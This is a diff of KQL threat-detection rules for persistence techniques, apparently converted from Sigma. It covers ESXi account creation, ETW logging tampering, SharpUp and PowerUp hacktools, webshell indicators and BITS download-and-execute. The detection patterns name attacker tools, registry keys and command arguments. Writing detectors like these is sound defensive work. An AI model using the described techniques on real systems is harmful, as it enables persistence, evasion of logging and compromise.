-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: ESXi Account Creation Via ESXCLI
+// Author: Cedric Maurugeon
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects user account creation on ESXi system via esxcli
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.t1136, attack.t1059.012
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "system " and ProcessCommandLine contains "account " and ProcessCommandLine contains "add ") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql b/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql
index e858882a..4e3110fb 100644
--- a/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql
+++ b/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql
@@ -1,12 +1,12 @@
-// Title: ESXi Admin Permission Assigned To Account Via ESXCLI
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-09-04
-// Level: high
-// Description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1059.012, attack.t1098
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: ESXi Admin Permission Assigned To Account Via ESXCLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-04
+// Level: high
+// Description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1059.012, attack.t1098
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "system" and (ProcessCommandLine contains " permission " and ProcessCommandLine contains " set" and ProcessCommandLine contains "Admin") and FolderPath endswith "/esxcli"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql b/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql
index bb458995..0e260f96 100644
--- a/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql
+++ b/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql
@@ -1,10 +1,10 @@
-// Title: ETW Logging Disabled For rpcrt4.dll
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-09
-// Level: low
-// Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
-
-DeviceRegistryEvents
+// Title: ETW Logging Disabled For rpcrt4.dll
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-09
+// Level: low
+// Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
+
+DeviceRegistryEvents
 | where (RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Windows NT\\Rpc\\ExtErrorInformation"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql b/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql
index 646cb83c..854243f6 100644
--- a/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql
+++ b/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql
@@ -1,10 +1,10 @@
-// Title: ETW Logging Disabled For SCM
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-09
-// Level: low
-// Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
-
-DeviceRegistryEvents
+// Title: ETW Logging Disabled For SCM
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-09
+// Level: low
+// Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows NT\\CurrentVersion\\Tracing\\SCM\\Regular\\TracingDisabled"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql b/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql
index 11f646b7..e785f6eb 100644
--- a/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql
+++ b/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql
@@ -1,10 +1,10 @@
-// Title: ETW Logging Disabled In .NET Processes - Sysmon Registry
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-06-05
-// Level: high
-// Description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
-
-DeviceRegistryEvents
+// Title: ETW Logging Disabled In .NET Processes - Sysmon Registry
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-06-05
+// Level: high
+// Description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562
+
+DeviceRegistryEvents
 | where ((RegistryValueData in~ ("0", "DWORD (0x00000000)")) and (RegistryKey endswith "\\COMPlus_ETWEnabled" or RegistryKey endswith "\\COMPlus_ETWFlags")) or (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\ETWEnabled")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql b/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql
index 6907e509..4a003dab 100644
--- a/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql
+++ b/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql
@@ -1,14 +1,14 @@
-// Title: HackTool - Powerup Write Hijack DLL
-// Author: Subhash Popuri (@pbssubhash)
-// Date: 2021-08-21
-// Level: high
-// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
-// In it's default mode, it builds a self deleting .bat file which executes malicious command.
-// The detection rule relies on creation of the malicious bat file (debug.bat by default).
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
-// False Positives:
-// - Any powershell script that creates bat files
-
-DeviceFileEvents
+// Title: HackTool - Powerup Write Hijack DLL
+// Author: Subhash Popuri (@pbssubhash)
+// Date: 2021-08-21
+// Level: high
+// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
+// In it's default mode, it builds a self deleting .bat file which executes malicious command.
+// The detection rule relies on creation of the malicious bat file (debug.bat by default).
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Any powershell script that creates bat files
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql b/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql
index 95869e63..3f8e0627 100644
--- a/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql
+++ b/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - SharpUp PrivEsc Tool Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-08-20
-// Level: critical
-// Description: Detects the use of SharpUp, a tool for local privilege escalation
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.discovery, attack.execution, attack.t1615, attack.t1569.002, attack.t1574.005
-
-DeviceProcessEvents
+// Title: HackTool - SharpUp PrivEsc Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-20
+// Level: critical
+// Description: Detects the use of SharpUp, a tool for local privilege escalation
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.discovery, attack.execution, attack.t1615, attack.t1569.002, attack.t1574.005
+
+DeviceProcessEvents
 | where FolderPath endswith "\\SharpUp.exe" or ProcessVersionInfoFileDescription =~ "SharpUp" or (ProcessCommandLine contains "HijackablePaths" or ProcessCommandLine contains "UnquotedServicePath" or ProcessCommandLine contains "ProcessDLLHijack" or ProcessCommandLine contains "ModifiableServiceBinaries" or ProcessCommandLine contains "ModifiableScheduledTask" or ProcessCommandLine contains "DomainGPPPassword" or ProcessCommandLine contains "CachedGPPPassword")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/ie_change_domain_zone.kql b/KQL/rules/Persistence/ie_change_domain_zone.kql
index e86cf1a3..e517c9d5 100644
--- a/KQL/rules/Persistence/ie_change_domain_zone.kql
+++ b/KQL/rules/Persistence/ie_change_domain_zone.kql
@@ -1,12 +1,12 @@
-// Title: IE Change Domain Zone
-// Author: frack113
-// Date: 2022-01-22
-// Level: medium
-// Description: Hides the file extension through modification of the registry
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1137
-// False Positives:
-// - Administrative scripts
-
-DeviceRegistryEvents
+// Title: IE Change Domain Zone
+// Author: frack113
+// Date: 2022-01-22
+// Level: medium
+// Description: Hides the file extension through modification of the registry
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137
+// False Positives:
+// - Administrative scripts
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains*" and (not((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "(Empty)"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql b/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql
index d0a062eb..87505a48 100644
--- a/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql
+++ b/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql
@@ -1,12 +1,12 @@
-// Title: IIS Native-Code Module Command Line Installation
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-12-11
-// Level: medium
-// Description: Detects suspicious IIS native-code module installations via command line
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1505.003
-// False Positives:
-// - Unknown as it may vary from organisation to organisation how admins use to install IIS modules
-
-DeviceProcessEvents
+// Title: IIS Native-Code Module Command Line Installation
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-12-11
+// Level: medium
+// Description: Detects suspicious IIS native-code module installations via command line
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+// False Positives:
+// - Unknown as it may vary from organisation to organisation how admins use to install IIS modules
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains "install" and ProcessCommandLine contains "module") and (ProcessCommandLine contains "-name:" or ProcessCommandLine contains "/name:" or ProcessCommandLine contains "–name:" or ProcessCommandLine contains "—name:" or ProcessCommandLine contains "―name:")) and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\iissetup.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/imports_registry_key_from_a_file.kql b/KQL/rules/Persistence/imports_registry_key_from_a_file.kql
index d4244714..a0e79b65 100644
--- a/KQL/rules/Persistence/imports_registry_key_from_a_file.kql
+++ b/KQL/rules/Persistence/imports_registry_key_from_a_file.kql
@@ -1,13 +1,13 @@
-// Title: Imports Registry Key From a File
-// Author: Oddvar Moe, Sander Wiebing, oscd.community
-// Date: 2020-10-07
-// Level: medium
-// Description: Detects the import of the specified file to the registry with regedit.exe.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1112, attack.defense-evasion
-// False Positives:
-// - Legitimate import of keys
-// - Evernote
-
-DeviceProcessEvents
+// Title: Imports Registry Key From a File
+// Author: Oddvar Moe, Sander Wiebing, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects the import of the specified file to the registry with regedit.exe.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+// False Positives:
+// - Legitimate import of keys
+// - Evernote
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " /i " or ProcessCommandLine contains " /s " or ProcessCommandLine contains ".reg") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " –e " or ProcessCommandLine contains " —e " or ProcessCommandLine contains " ―e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " –a " or ProcessCommandLine contains " —a " or ProcessCommandLine contains " ―a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") and ProcessCommandLine matches regex ":[^ \\\\]")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql b/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql
index dedf9ed8..09572d16 100644
--- a/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql
+++ b/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql
@@ -1,10 +1,10 @@
-// Title: Imports Registry Key From an ADS
-// Author: Oddvar Moe, Sander Wiebing, oscd.community
-// Date: 2020-10-12
-// Level: high
-// Description: Detects the import of a alternate datastream to the registry with regedit.exe.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1112, attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Imports Registry Key From an ADS
+// Author: Oddvar Moe, Sander Wiebing, oscd.community
+// Date: 2020-10-12
+// Level: high
+// Description: Detects the import of a alternate datastream to the registry with regedit.exe.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains " /i " or ProcessCommandLine contains ".reg") and ProcessCommandLine matches regex ":[^ \\\\]") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " –e " or ProcessCommandLine contains " —e " or ProcessCommandLine contains " ―e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " –a " or ProcessCommandLine contains " —a " or ProcessCommandLine contains " ―a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/interactive_at_job.kql b/KQL/rules/Persistence/interactive_at_job.kql
index ac88ff8a..0feaf4ea 100644
--- a/KQL/rules/Persistence/interactive_at_job.kql
+++ b/KQL/rules/Persistence/interactive_at_job.kql
@@ -1,12 +1,12 @@
-// Title: Interactive AT Job
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019-10-24
-// Level: high
-// Description: Detects an interactive AT job, which may be used as a form of privilege escalation.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.002
-// False Positives:
-// - Unlikely (at.exe deprecated as of Windows 8)
-
-DeviceProcessEvents
+// Title: Interactive AT Job
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detects an interactive AT job, which may be used as a form of privilege escalation.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.002
+// False Positives:
+// - Unlikely (at.exe deprecated as of Windows 8)
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "interactive" and FolderPath endswith "\\at.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/linux_webshell_indicators.kql b/KQL/rules/Persistence/linux_webshell_indicators.kql
index 9fe9b890..87162cc1 100644
--- a/KQL/rules/Persistence/linux_webshell_indicators.kql
+++ b/KQL/rules/Persistence/linux_webshell_indicators.kql
@@ -1,12 +1,12 @@
-// Title: Linux Webshell Indicators
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-10-15
-// Level: high
-// Description: Detects suspicious sub processes of web server processes
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1505.003
-// False Positives:
-// - Web applications that invoke Linux command line tools
-
-DeviceProcessEvents
+// Title: Linux Webshell Indicators
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-10-15
+// Level: high
+// Description: Detects suspicious sub processes of web server processes
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+// False Positives:
+// - Web applications that invoke Linux command line tools
+
+DeviceProcessEvents
 | where ((InitiatingProcessFolderPath endswith "/httpd" or InitiatingProcessFolderPath endswith "/lighttpd" or InitiatingProcessFolderPath endswith "/nginx" or InitiatingProcessFolderPath endswith "/apache2" or InitiatingProcessFolderPath endswith "/node" or InitiatingProcessFolderPath endswith "/caddy") or (InitiatingProcessCommandLine contains "/bin/java" and InitiatingProcessCommandLine contains "tomcat") or (InitiatingProcessCommandLine contains "/bin/java" and InitiatingProcessCommandLine contains "websphere")) and (FolderPath endswith "/whoami" or FolderPath endswith "/ifconfig" or FolderPath endswith "/ip" or FolderPath endswith "/bin/uname" or FolderPath endswith "/bin/cat" or FolderPath endswith "/bin/crontab" or FolderPath endswith "/hostname" or FolderPath endswith "/iptables" or FolderPath endswith "/netstat" or FolderPath endswith "/pwd" or FolderPath endswith "/route")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/macos_emond_launch_daemon.kql b/KQL/rules/Persistence/macos_emond_launch_daemon.kql
index 1d6c7e08..7d4cf49c 100644
--- a/KQL/rules/Persistence/macos_emond_launch_daemon.kql
+++ b/KQL/rules/Persistence/macos_emond_launch_daemon.kql
@@ -1,12 +1,12 @@
-// Title: MacOS Emond Launch Daemon
-// Author: Alejandro Ortuno, oscd.community
-// Date: 2020-10-23
-// Level: medium
-// Description: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.014
-// False Positives:
-// - Legitimate administration activities
-
-DeviceFileEvents
+// Title: MacOS Emond Launch Daemon
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-23
+// Level: medium
+// Description: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.014
+// False Positives:
+// - Legitimate administration activities
+
+DeviceFileEvents
 | where (FolderPath contains "/etc/emond.d/rules/" and FolderPath endswith ".plist") or FolderPath contains "/private/var/db/emondClients/"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql b/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql
index 7ed68386..0ca5d1c7 100644
--- a/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql
+++ b/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql
@@ -1,12 +1,12 @@
-// Title: Macro Enabled In A Potentially Suspicious Document
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-21
-// Level: high
-// Description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Macro Enabled In A Potentially Suspicious Document
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-21
+// Level: high
+// Description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where (RegistryKey contains "/AppData/Local/Microsoft/Windows/INetCache/" or RegistryKey contains "/AppData/Local/Temp/" or RegistryKey contains "/PerfLogs/" or RegistryKey contains "C:/Users/Public/" or RegistryKey contains "file:///D:/" or RegistryKey contains "file:///E:/") and RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql b/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
index 0182d337..1072f8df 100644
--- a/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
+++ b/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
@@ -1,11 +1,11 @@
-// Title: Malicious DLL File Dropped in the Teams or OneDrive Folder
-// Author: frack113
-// Date: 2022-08-12
-// Level: high
-// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
-// Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
-
-DeviceFileEvents
+// Title: Malicious DLL File Dropped in the Teams or OneDrive Folder
+// Author: frack113
+// Date: 2022-08-12
+// Level: high
+// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
+// Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
+
+DeviceFileEvents
 | where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql b/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql
index b0ce1d9b..f5056c4c 100644
--- a/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql
+++ b/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql
@@ -1,14 +1,14 @@
-// Title: Mask System Power Settings Via Systemctl
-// Author: Milad Cheraghi, Nasreddine Bencherchali
-// Date: 2025-10-17
-// Level: high
-// Description: Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep.
-// Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted.
-// This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.impact, attack.t1653
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Mask System Power Settings Via Systemctl
+// Author: Milad Cheraghi, Nasreddine Bencherchali
+// Date: 2025-10-17
+// Level: high
+// Description: Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep.
+// Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted.
+// This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.impact, attack.t1653
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "suspend.target" or ProcessCommandLine contains "hibernate.target" or ProcessCommandLine contains "hybrid-sleep.target") and (ProcessCommandLine contains " mask" and FolderPath endswith "/systemctl")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/modification_of_ie_registry_settings.kql b/KQL/rules/Persistence/modification_of_ie_registry_settings.kql
index 911580fd..8711bbf5 100644
--- a/KQL/rules/Persistence/modification_of_ie_registry_settings.kql
+++ b/KQL/rules/Persistence/modification_of_ie_registry_settings.kql
@@ -1,10 +1,10 @@
-// Title: Modification of IE Registry Settings
-// Author: frack113
-// Date: 2022-01-22
-// Level: low
-// Description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert JavaScript for persistence
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: Modification of IE Registry Settings
+// Author: frack113
+// Date: 2022-01-22
+// Level: low
+// Description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert JavaScript for persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" and (not((RegistryValueData =~ "Binary Data" or RegistryValueData startswith "DWORD" or isnull(RegistryValueData) or (RegistryValueData in~ ("Cookie:", "Visited:", "(Empty)")) or (RegistryKey contains "\\Cache" or RegistryKey contains "\\ZoneMap" or RegistryKey contains "\\WpadDecision")))) and (not(RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Accepted Documents"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql b/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql
index d94ff684..471f25b9 100644
--- a/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql
+++ b/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql
@@ -1,10 +1,10 @@
-// Title: Modify User Shell Folders Startup Value
-// Author: frack113
-// Date: 2022-10-01
-// Level: high
-// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.001
-
-DeviceRegistryEvents
+// Title: Modify User Shell Folders Startup Value
+// Author: frack113
+// Date: 2022-10-01
+// Level: high
+// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.001
+
+DeviceRegistryEvents
 | where RegistryKey contains "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" and RegistryKey endswith "Startup"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql b/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql
index 6f1fd198..ca21e44d 100644
--- a/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql
+++ b/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql
@@ -1,13 +1,13 @@
-// Title: Monitoring For Persistence Via BITS
-// Author: Sreeman
-// Date: 2020-10-29
-// Level: medium
-// Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.
-// When the job runs on the system the command specified in the BITS job will be executed.
-// This can be abused by actors to create a backdoor within the system and for persistence.
-// It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1197
-
-DeviceProcessEvents
+// Title: Monitoring For Persistence Via BITS
+// Author: Sreeman
+// Date: 2020-10-29
+// Level: medium
+// Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.
+// When the job runs on the system the command specified in the BITS job will be executed.
+// This can be abused by actors to create a backdoor within the system and for persistence.
+// It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1197
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and ((ProcessCommandLine contains "/SetNotifyCmdLine" and (ProcessCommandLine contains "%COMSPEC%" or ProcessCommandLine contains "cmd.exe" or ProcessCommandLine contains "regsvr32.exe")) or (ProcessCommandLine contains "/Addfile" and (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:" or ProcessCommandLine contains "ftp:" or ProcessCommandLine contains "ftps:")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/msexchange_transport_agent_installation.kql b/KQL/rules/Persistence/msexchange_transport_agent_installation.kql
index 021db9d8..d9a412f5 100644
--- a/KQL/rules/Persistence/msexchange_transport_agent_installation.kql
+++ b/KQL/rules/Persistence/msexchange_transport_agent_installation.kql
@@ -1,12 +1,12 @@
-// Title: MSExchange Transport Agent Installation
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2021-06-08
-// Level: medium
-// Description: Detects the Installation of a Exchange Transport Agent
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1505.002
-// False Positives:
-// - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.
-
-DeviceProcessEvents
+// Title: MSExchange Transport Agent Installation
+// Author: Tobias Michalski (Nextron Systems)
+// Date: 2021-06-08
+// Level: medium
+// Description: Detects the Installation of a Exchange Transport Agent
